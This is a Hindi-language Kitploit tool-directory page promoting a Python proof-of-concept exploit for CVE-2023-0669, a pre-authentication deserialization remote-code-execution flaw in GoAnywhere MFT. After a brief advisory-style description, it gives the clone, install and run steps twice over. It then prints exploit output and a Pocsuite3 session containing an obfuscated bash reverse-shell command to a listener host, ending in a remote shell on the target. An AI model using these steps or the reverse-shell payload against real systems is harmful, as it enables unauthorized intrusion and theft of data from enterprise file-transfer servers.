Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet डिसीरियलाइज़ेशन कमज़ोरियाँ Python RCE PoC(प्रमाण की अवधारणा) | Kitploit
उपकरण/GitHubGitHub/avento/cve-2023-0669
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet डिसीरियलाइज़ेशन कमज़ोरियाँ Python RCE PoC(प्रमाण की अवधारणा)

रिपॉजिटरी देखें
833 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-0669 GoAnywhere MFT डिसेरियलाइज़ेशन - Je Yiuwai का ब्लॉग

CVE-2023-0669

CVE-2023-0669 एक GoAnywhere MFT डिसेरियलाइज़ेशन भेद्यता है, जो लाइसेंस रिस्पॉन्स सर्वलेट में प्री-ऑथेंटिकेटेड कमांड इंजेक्शन भेद्यता के कारण उत्पन्न होती है, जिससे हमलावर हमलावर द्वारा नियंत्रित ऑब्जेक्ट को डिसेरियलाइज़ करके प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकता है। यह भेद्यता संस्करण 7.1.2 से पहले (7.1.2 को छोड़कर) को प्रभावित करती है।

CVE-2023-0669 एक GoAnywhere MFT डिसेरियलाइज़ेशन भेद्यता है, जो लाइसेंस रिस्पॉन्स सर्वलेट में प्री-ऑथेंटिकेटेड कमांड इंजेक्शन भेद्यता के कारण उत्पन्न होती है, जो हमलावर को इच्छानुसार कोड निष्पादित करने की अनुमति देती है।

यह भेद्यता एंटरप्राइज़-स्तरीय फ़ाइल ट्रांसफर सॉफ़्टवेयर GoAnywhere MFT की सुरक्षा के लिए गंभीर खतरा उत्पन्न करती है। हमलावर इसका फायदा उठाकर संवेदनशील डेटा चुरा सकते हैं, डेटा में छेड़छाड़ कर सकते हैं, और सिस्टम से समझौता कर सकते हैं। इसलिए, उपयोगकर्ताओं को अपने सिस्टम की सुरक्षा के लिए तुरंत उपाय करने की आवश्यकता है।

आधिकारिक सुरक्षा सलाह जारी की गई है, और प्रारंभिक जांच विधियाँ प्रदान की गई हैं। उपयोगकर्ता यह जांच सकते हैं कि क्या userdata/logs लॉग में विशिष्ट स्ट्रिंग दिखाई देती है, ताकि यह पता चल सके कि सिस्टम इस भेद्यता से प्रभावित है या नहीं। यदि पैच लागू नहीं किए जा सकते, तो सिस्टम की सुरक्षा के लिए अन्य सुरक्षा उपाय अपनाने की सिफारिश की जाती है।

संक्षेप में, CVE-2023-0669 एक डिसेरियलाइज़ेशन भेद्यता है जो उपयोगकर्ताओं का ध्यान आकर्षित करती है। उपयोगकर्ताओं को तुरंत नवीनतम संस्करण में अपडेट करना चाहिए और जांचना चाहिए कि क्या उनके सिस्टम इस भेद्यता से प्रभावित हैं। साथ ही, उपयोगकर्ताओं को GoAnywhere MFT जैसे एंटरप्राइज़-स्तरीय सॉफ़्टवेयर की सुरक्षा प्रबंधन को मजबूत करने और सिस्टम की सुरक्षा के लिए बहु-स्तरीय सुरक्षा उपाय अपनाने की सलाह दी जाती है।

CVE-2023-0669 PoC

परिचय

यह एक्सप्लॉइट एक पायथन स्क्रिप्ट है, जिसका उपयोग GoAnywhere MFT v6.7.9594 और उससे पहले के संस्करणों में भेद्यता CVE-2023-0669 का दोहन करने के लिए किया जाता है।

भेद्यता विवरण

यह भेद्यता GoAnywhere MFT में एन्क्रिप्टेड बंडल अनुरोधों को संसाधित करते समय सुरक्षा समस्या के कारण मौजूद है। हमलावर एक विशेष रूप से तैयार अनुरोध भेजकर लक्ष्य सर्वर पर मनमाना कोड निष्पादित कर सकता है।

उपयोग विधि

  1. इस रिपॉजिटरी को क्लोन करें।
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. CVE-2023-0669 निर्देशिका में प्रवेश करें।
root@kitploit:~
cd CVE-2023-0669
  1. निर्भरता लाइब्रेरीज़ requests और cryptography स्थापित करें।
root@kitploit:~
pip install requests cryptography
  1. एक्सप्लॉइट चलाएँ।
root@kitploit:~
python CVE-2023-0669.py --host <लक्ष्य सर्वर IP>

सावधानियाँ

  • इस एक्सप्लॉइट को चलाने के लिए वैध पहुँच अधिकार आवश्यक हैं, और इसका उपयोग अवैध उद्देश्यों के लिए नहीं किया जाना चाहिए।
  • चूंकि इस एक्सप्लॉइट के निष्पादन से लक्ष्य सर्वर को जोखिम होता है, इसलिए उपयोगकर्ता इसके जोखिमों और परिणामों के लिए पूरी तरह से स्वयं जिम्मेदार है।

परिचय

यह एक्सप्लॉइट एक पायथन स्क्रिप्ट है, जिसका उपयोग GoAnywhere MFT v6.7.9594 और उससे पहले के संस्करणों में भेद्यता CVE-2023-0669 का दोहन करने के लिए किया जाता है।

भेद्यता विवरण

यह भेद्यता GoAnywhere MFT में एन्क्रिप्टेड बंडल अनुरोधों को संसाधित करते समय सुरक्षा समस्या के कारण मौजूद है। हमलावर एक विशेष रूप से तैयार अनुरोध भेजकर लक्ष्य सर्वर पर मनमाना कोड निष्पादित कर सकता है।

उपयोग विधि

  1. इस रिपॉजिटरी को क्लोन करें।
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. निर्देशिका में प्रवेश करें।
root@kitploit:~
cd CVE-2023-0669
  1. निर्भरता लाइब्रेरीज़ requests और cryptography स्थापित करें।
root@kitploit:~
pip install requests cryptography
  1. एक्सप्लॉइट चलाएँ।
root@kitploit:~
python CVE-2023-0669.py --host <लक्ष्य IP>

सावधानी

  • इस एक्सप्लॉइट को चलाने के लिए वैध पहुँच अधिकार आवश्यक हैं, और इसका उपयोग अवैध उद्देश्यों के लिए नहीं किया जाना चाहिए।
  • चूंकि इस एक्सप्लॉइट के निष्पादन से लक्ष्य सर्वर को जोखिम होता है, इसलिए उपयोगकर्ता इसके जोखिमों और परिणामों के लिए पूरी तरह से स्वयं जिम्मेदार है।

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

लेखक: Je Yiuwai द्वारा संपादित xiaomi pad 6 pro द्वारा

टूल डाउनलोड करें